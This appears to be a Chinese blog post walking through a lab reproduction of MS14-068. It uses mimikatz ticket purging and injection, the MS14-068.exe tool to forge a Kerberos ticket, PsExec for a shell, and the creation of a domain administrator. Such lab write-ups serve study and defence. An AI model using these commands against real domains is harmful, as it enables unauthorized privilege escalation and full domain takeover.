ms14-068复现

MS14-068复现

域控制器:windows2008 R2 test.com 192.168.146.138

域内机器:Windows7

1.查看漏洞是否存在

systeminfo

image-20211118083344691

发现没有打相关补丁,漏洞存在

2.配置windows sever2008 R2

打开cmd输入

dcpromo

image-20211118083732751

安装完成后得到结果(详细过程见windows sever2008 R2环境配置)

image-20211118083557858

3.配置windows7

打开网络进行配置

image-20211118084204425

将DNS配置为Windows sever 2008R2的IP

image-20211118084252611

连接成功

image-20211118083951236

注:需要先在windows sever2008 R2中创建一个普通用户,然后在windows7中登录该用户

4.漏洞利用

用普通用户登录,测试访问域控的C盘共享

dir \\登录服务器.域\c$

image-20211118090133449

被拒绝

了使我们生成的票据起作用,首先我们需要将内存中已有的kerberos票据清除,清除方法使用mimikatz

kerberos::list

image-20211118100600252

kerberos::purge

image-20211118100646460

kerberos::list

image-20211118100727469

查看本机用户ID

whoani/all

image-20211118100830432

利用ms14-068.exe提权工具生成伪造的kerberos协议认证证书

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d 192.168.146.138

image-20211118103221324

得到票据

image-20211118103311270

注入票据

kerberos::ptc 票据位置

image-20211118105245605

再列出域控制器的C盘目录

image-20211118105824163

使用PSTools目录下的PsExec.exe获取shell:

image-20211118110516987

添加域管理员

image-20211118110825297

创建成功

漏洞复现完成
shell:

[外链图片转存中...(img-vQWVZd6H-1637217407316)]

添加域管理员
在这里插入图片描述

创建成功

漏洞复现完成

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值